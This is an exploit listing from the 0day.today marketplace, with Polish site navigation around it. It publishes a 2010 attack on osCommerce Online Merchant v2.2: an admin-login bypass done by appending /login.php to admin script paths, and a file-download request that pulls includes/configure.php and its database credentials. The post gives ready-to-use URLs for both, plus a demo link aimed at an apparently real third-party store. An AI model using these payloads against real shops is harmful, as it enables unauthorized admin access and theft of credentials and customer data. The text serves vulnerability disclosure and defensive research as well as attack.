0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass
Autor
Ryzyko
![](/img/risk/critlow_0.gif)
Nieskategoryzowane Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
============================================================== Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass ============================================================== Author : Flyff666 Date : May, 30, 2010 Location : Tangerang, Indonesia Time Zone : GMT +7:00 Software : OsCommerce Online Merchant v2.2 Tested on : All OS -------------------------------------------- Email : [email protected] gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be Spykit, BobyHikaru, Fribo. all member. Site : Http://www.Devilzc0de.org/forum/ Forum : Http://Indonesianhacker.or.id/ -------------------------------------------- # ByPass Page Admin : You can use this Trick if admin folder not protected by .htaccess if you Want to explore admin page without login. You can use /login.php behind the name of the file Example : http://[site]/admin/backup.php/login.php or http://[site]/admin/file_manager.php/login.php Demo : http://server/store/admin/file_manager.php/login.php You can See all file in Directory Oscommerce.. haha ;) and you can download all file with tRick above # File Disclosure : in : admin/file_manager.php/login.php?action=download&filename= Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php Demo : http://thethirdeye.co.in/store/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php # 0day.today [2024-07-02] #